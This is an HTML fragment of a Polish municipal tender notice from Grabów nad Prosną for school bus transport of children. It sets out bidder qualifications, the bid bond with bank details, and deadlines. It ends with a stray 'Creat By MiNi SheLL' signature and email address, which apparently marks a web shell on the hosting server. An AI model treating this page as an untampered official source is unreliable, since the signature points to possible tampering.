class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Sposób oceny ofert zawarty został w SWZ</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin płatności faktury</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <p class="mb-0">Art. 109 ust. 1 pkt 6</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <p class="mb-0">Art. 109 ust. 1 pkt 8</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> Za spełniających warunki udziału w postępowaniu Zamawiający uzna Wykonawców, <br/>którzy: <br/>1)	dotyczy Części 1: wykażą, że posiadają aktualne, udzielone zgodnie z przepisami ustawy z dnia 6 września 2001 r. o transporcie drogowym (Dz.U. z 2024 poz. 1539 ), zezwolenie na wykonywanie zawodu przewoźnika drogowego lub licencję na wykonywanie krajowego transportu drogowego osób. Ocena spełniania warunków udziału w postępowaniu będzie dokonana na oświadczenia wykonawcy, na zasadzie spełnia/nie spełnia. <br/>2)	dotyczy Części 1: wykażą należyte wykonanie lub wykonywanie w ciągu ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy, to w tym okresie, co najmniej jedną usługę wykonywaną w sposób ciągły przez okres min. 9 miesięcy, o wartości min. 100.000,00 zł brutto polegającą na dowozie dzieci lub młodzieży do przedszkoli lub szkół, która została wykonana w sposób należyty.<br/>Zamawiający uznaje za wystarczające wskazanie w wykazie, o którym mowa w pkt 13.8.1 SWZ jedynie takich usług, które potwierdzą spełnienie warunków postawionych przez Zamawiającego.<br/>Przez usługę rozumie się wykonywanie prac na podstawie 1 umowy. W przypadku usługi wykonywanej wymóg wartości 100.000,00 zł dotyczy tej części usługi, która już została wykonana. <br/>3)	dotyczy Części 1: wykonawca wykaże, że posiada lub dysponuje potencjałem technicznym niezbędnym do należytego wykonania niniejszego zamówienia, <br/>tj. dysponuje co najmniej 4 autokarami wszystkie samochody z liczbą miejsc siedzących co najmniej 50, oraz jednym zastępczym autokarem na wypadek awarii. Wymagania dodatkowe dotyczące pojazdów - Wykonawca zobowiązany jest świadczyć usługi objęte zamówieniem pojazdami posiadającymi aktualne badanie techniczne pojazdu, ubezpieczenie OC i NNW, pojazdy wyprodukowane nie wcześniej niż w 2009 r.<br/>4)	dotyczy Części 2: wykażą, że posiadają aktualne, udzielone zgodnie z przepisami ustawy z dnia 6 września 2001 r. o transporcie drogowym (Dz.U. z 2024 poz. 1539 ), zezwolenie na wykonywanie zawodu przewoźnika drogowego lub licencję na wykonywanie krajowego transportu drogowego osób. Ocena spełniania warunków udziału <br/>w postępowaniu będzie dokonana na oświadczenia wykonawcy, na zasadzie spełnia/nie spełnia; <br/>5)	dotyczy Części 2: wykażą należyte wykonanie lub wykonywanie w ciągu ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy, to w tym okresie, co najmniej jedną usługę wykonywaną w sposób ciągły przez okres min. 3 miesięcy, o wartości min. 60.000,00 zł brutto polegającą na dowozie dzieci niepełnosprawnych do palcówek edukacyjnych lub wychowawczych, która została wykonana z sposób należyty.<br/>Zamawiający uznaje za wystarczające wskazanie w wykazie, o którym mowa w pkt 13.8.1 SWZ jedynie takich usług, które potwierdzą spełnienie warunków postawionych przez Zamawiającego.<br/>Przez usługę rozumie się wykonywanie prac na podstawie 1 umowy. W przypadku usługi wykonywanej wymóg wartości 60.000,00 zł dotyczy tej części usługi, która już została wykonana. <br/>6)	dotyczy Części 2: wykonawca wykaże, że posiada lub dysponuje potencjałem technicznym niezbędnym do należytego wykonania niniejszego zamówienia, tj. dysponuje co najmniej 1 pojazdem typu BUS zarejestrowany do przewozu max. 18 osób. <br/>Wymagania dodatkowe dotyczące pojazdów - Wykonawca zobowiązany jest świadczyć usługi objęte zamówieniem pojazdem posiadającymi aktualne badanie techniczne pojazdu, ubezpieczenie OC i NNW, pojazd wyprodukowany nie wcześniej niż w 2019 r. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">W celu potwierdzenia braku podstaw wykluczenia wykonawcy z udziału <br/>w postępowaniu wyłącznie na wezwanie Zamawiającego (po otwarciu ofert) Wykonawca zobowiązany jest złożyć następujące podmiotowe środki dowodowe:<br/>1)	oświadczenie o aktualności informacji zawartych w oświadczeniu, o którym mowa w pkt 13.1 SWZ, w zakresie podstaw wykluczenia wskazanych przez Zamawiającego w pkt 11.1 i 11.2 SWZ, zgodnie ze wzorem (wymagany zakres informacji) stanowiącym załącznik do SWZ pn. „Oświadczenie o aktualności informacji zawartych w oświadczeniu, o którym mowa w art. 125 ust. 1 ustawy Pzp, w zakresie braku podstaw wykluczenia z postępowania”.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">W celu potwierdzenia spełnienia warunków udziału w postępowaniu wyłącznie na wezwanie Zamawiającego (po otwarciu ofert) Wykonawca zobowiązany jest złożyć następujące podmiotowe środki dowodowe:<br/>1)	wykaz należycie wykonanych w okresie ostatnich 3 lat od dnia, w którym upływa termin składania ofert, usług spełniających warunek, o którym mowa odpowiednio w pkt 12.2.2 SWZ lub 12.2.5 SWZ (w zależności od Części zamówienia na którą Wykonawca składa ofertę)- wzór wykazu (wymagany zakres informacji) stanowi załącznik do SWZ (Doświadczenie zawodowe - dotyczy Części 1 oraz Doświadczenie zawodowe - dotyczy Części 2 );<br/>2)	dowody określające czy usługi wymienione w odpowiednich wykazach, <br/>o których mowa w pkt. 13.3.1 SWZ zostały wykonane należycie;<br/>Dowodami, o których mowa wyżej są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego uslugi zostały wykonane, a jeżeli wykonawca z przyczyn niezależnych od niego (co jest zobowiązany wykazać) nie jest w stanie uzyskać tych dokumentów – inne odpowiednie dokumenty.<br/>3)	wykaz pojazdów dostępnych Wykonawcy w celu wykonania zamówienia publicznego , spełniających warunek o którym mowa odpowiednio w pkt 12.2.3 SWZ lub 12.2.6 SWZ (w zależności od Części zamówienia na którą Wykonawca składa ofertę)- wzór wykazu (wymagany zakres informacji) stanowi załącznik do SWZ (Potencjał techniczny- dotyczy Części 1 oraz Potencjał techniczny - dotyczy Części 2 )</span> </h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Do oferty (tj. dokumentu, o którym mowa w pkt 20.7 SWZ) należy dołączyć:<br/>1)	oświadczenia, o których mowa w pkt 13.1 SWZ, również w przypadku o którym mowa w pkt 14.3 lub 15.3 SWZ (jeśli dotyczy);<br/>2)	zobowiązanie podmiotu udostępniającego zasoby, o którym mowa w pkt 14.2 SWZ - w sytuacji, gdy Wykonawca polega na zasobach innych podmiotów na zasadach określonych w art. 118 ustawy Pzp (jeśli dotyczy);<br/>3)	dokument pełnomocnictwa do reprezentowania wszystkich Wykonawców wspólnie ubiegających się o udzielenie zamówienia, o którym mowa w pkt 15.1 SWZ, <br/>z którego będzie wynikać przedmiotowe pełnomocnictwo (jeśli dotyczy);<br/>4)	dokumenty potwierdzające umocowanie do reprezentowania Wykonawcy, o których mowa w pkt 13.17 SWZ (jeśli dotyczy);<br/>5)	dokument pełnomocnictwa, o którym mowa w pkt 20.8.2 SWZ (jeśli dotyczy);<br/>6) dowód wniesienia wadium - patrz pkt 18 SWZ. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 1.	Wykonawca zobowiązany jest do wniesienia wadium przed upływem terminu składania ofert w wysokości dla poszczególnych Części:<br/>	- Część 1 – 5.000,00 (słownie złotych: pięć tysięcy złotych 00/100);<br/>	- Część 2 – 2.000,00 (słownie złotych: dwa tysiące złotych 00/100).<br/>2.	Formę wniesienia wadium wybiera Wykonawca spośród przewidzianych w art. 97 ust. 7 ustawy.<br/>3.	Wadium musi zabezpieczać złożoną ofertę przez cały okres związania ofertą.<br/>4.	Wadium wnoszone w pieniądzu należy wpłacić przelewem na rachunek bankowy Zamawiającego: RBS Lututów o/ Grabów nad Prosną Numer konta: 47 9256 0004 0062 0875 2000 0040 w dopiskiem „Wadium, nr sprawy RIOŚ.271.6.2024 – Część ….”.<br/>Wskazane jest załączenie do oferty składanej na Platformie potwierdzenia dokonania przelewu poprzez wczytanie pliku na Platformie jako załącznik do oferty.<br/>5.	Wadium musi wpłynąć na wskazany rachunek bankowy najpóźniej przed upływem terminu składania ofert (decyduje data wpływu na rachunek bankowy Zamawiającego). Tym samym zlecenie dokonania przelewu przez Wykonawcę w dniu składania ofert lub dniu poprzedzającym może okazać się zbyt późne.<br/>6.	Wadium wnoszone w formie poręczeń lub gwarancji należy załączyć do oferty w oryginale w postaci dokumentu elektronicznego podpisanego kwalifikowanym podpisem elektronicznym przez wystawcę poręczenia lub gwarancji oraz powinno zawierać: <br/>1)	wskazanie Beneficjenta poręczenia lub gwarancji, którym musi być Miasto i Gmina Grabów nad Prosną, ul. Kolejowa 8 , 63-520 Grabów nad Prosną; <br/>2)	nazwę i adres siedziby Wykonawcy; <br/>3)	kwotę i termin ważności gwarancji/poręczenia; <br/>4)	bezwarunkowe zobowiązanie wystawcy poręczenia lub gwarancji do zapłaty kwoty wadium, na pierwsze pisemne żądanie Zamawiającego, w sytuacjach określonych w art. 98 ust. 6 ustawy Pzp. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1.	Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego. <br/>Pełnomocnictwo, o którym mowa wyżej należy sporządzić w jednej z form wskazanych poniżej, a następnie przekazać Zamawiającemu wyłącznie za pośrednictwem Platformy. <br/>Pełnomocnictwo, o którym mowa powyżej należy złożyć w jednej z poniższych form:<br/>-w formie elektronicznej (tj. postaci elektronicznej opatrzonej kwalifikowanym podpisem elektronicznym przez osobę/osoby uprawnioną/ne do reprezentowania Wykonawców,<br/>-cyfrowego odwzorowania pełnomocnictwa sporządzonego w postaci papierowej po-świadczonego przez mocodawców, tj. dokumentu elektronicznego będącego kopią elektroniczną treści pełnomocnictwa zapisanej w postaci papierowej, opatrzonego kwalifikowanym podpisem elektronicznym przez mocodawców,<br/>-cyfrowego odwzorowania pełnomocnictwa sporządzonego w postaci papierowej po-świadczonego przez notariusza, tj. dokumentu elektronicznego będącego kopią elektroniczną treści pełnomocnictwa zapisanej w postaci papierowej, opatrzonego kwalifikowanym podpisem elektronicznym.<br/>2.	W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, żaden z nich nie może podlegać wykluczeniu z postępowania z powodów, o których mowa w pkt 11.1 i 11.2 SWZ, natomiast spełnianie warunków udziału w postępowaniu, o których mowa w pkt 12.2 SWZ Wykonawcy wykazują w sposób następujący:<br/>1)	każdy z wykonawców - jeżeli będzie wykonywał czynności, do wykonania których wymagane jest posiadanie uprawnień, o których mowa odpowiednio w pkt 12.2.1 lub 12.2.4 SWZ – w zależności od Części na którą składana jest oferta; <br/>2)	co najmniej jeden z wykonawców – jeżeli zrealizuje usługi, do wykonania których wymagane jest posiadanie doświadczenia, o którym mowa w pkt 12.2.2 SWZ lub 12.2.5 SWZ – w zależności od Części na którą składana jest oferta (Zamawiający nie dopuszcza „sumowania” doświadczenia dwóch i więcej wykonawców w celu potwierdzenia spełnienia tego warunku);<br/>3)	co najmniej jeden z wykonawców – w zakresie warunku, o którym mowa w pkt 12.2.3 lub 12.2.6 SWZ– w zależności od Części na którą składana jest oferta.<br/>3.	W przypadku wspólnego ubiegania się o zamówienie przez Wykonawców oświadczenia, o których mowa w pkt 13.1 SWZ składa każdy z Wykonawców wspólnie ubiegających się o udzielenie zamówienia (z zachowaniem formy przewidzianej w pkt 13.4 SWZ).<br/>4.	W celu potwierdzenia braku podstaw do wykluczenia z postępowania, o których mowa w art. 11.1 i 11.2 SWZ oraz spełniania warunków udziału w postępowaniu, o których mowa w pkt 12.2 SWZ każdy z Wykonawców wspólnie ubiegających się o udzielenie zamówienia zobowiązany jest do złożenia na wezwanie Zamawiającego(po otwarciu ofert) podmiotowych środków dowodowych, o których mowa w pkt 13.2 SWZ oraz w zakresie, w którym wykazuje spełnianie warunków udziału w postępowaniu, podmiotowych środków dowodowych, o których mowa w 13.3 SWZ.<br/>5.	Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty oświadczenie o którym mowa w art. 117 ust. 4 ustawy Pzp, z którego wynika które usługi wykonają poszczególni wykonawcy, zgodnie ze wzorem (wymagany zakres informacji) stanowiącym załącznik do SWZ pn. „Oświadczenie Wykonawcy wspólnie ubiegającego się o udzielenie zamówienia, o którym mowa w art. 117 ust. 4 ustawy Pzp”. Oświadczenie, o którym mowa powyżej należy sporządzić w formie określonej w pkt 13.4 SWZ, a następnie przekazać Zamawiającemu wyłącznie za pośrednictwem Platformy wraz z ofertą.<br/>6.	Zamawiający nie dokonuje zastrzeżenia obowiązku osobistego wykonania przez poszczególnych Wykonawców wspólnie ubiegających się o udzielenie zamówienia kluczowych zadań, o którym mowa w art. 60 ustawy Pzp. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Rodzaj i zakres zmian oraz warunków ich wprowadzenia określa projekt umowy będący załącznikiem do SWZ. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2024-12-16 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://platformazakupowa.pl/pn/grabownadprosna</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2024-12-16 10:10</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2025-01-14</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> 1. Zamawiający w niniejszym postępowaniu nie dopuszcza możliwości porozumiewania się przy użyciu poczty elektronicznej, w związku z czym na adres poczty elektronicznej, który został podany w pkt 1.1.3 SWZ nie należy kierować żadnej korespondencji. <br/>2.Formę dokumentów lub oświadczeń, załączników jakie należy złożyć Zamawiającemu określona została w SWZ.<br/>3. Wymagania techniczne związane ze składaniem oferty w postaci elektronicznej zawarte zostały w SWZ. <br/>4.Szczegółowy sposób składania oferty, dokumentów lub oświadczeń, załączników zawiera SWZ.

Creat By MiNi SheLL
Email: jattceo@gmail.com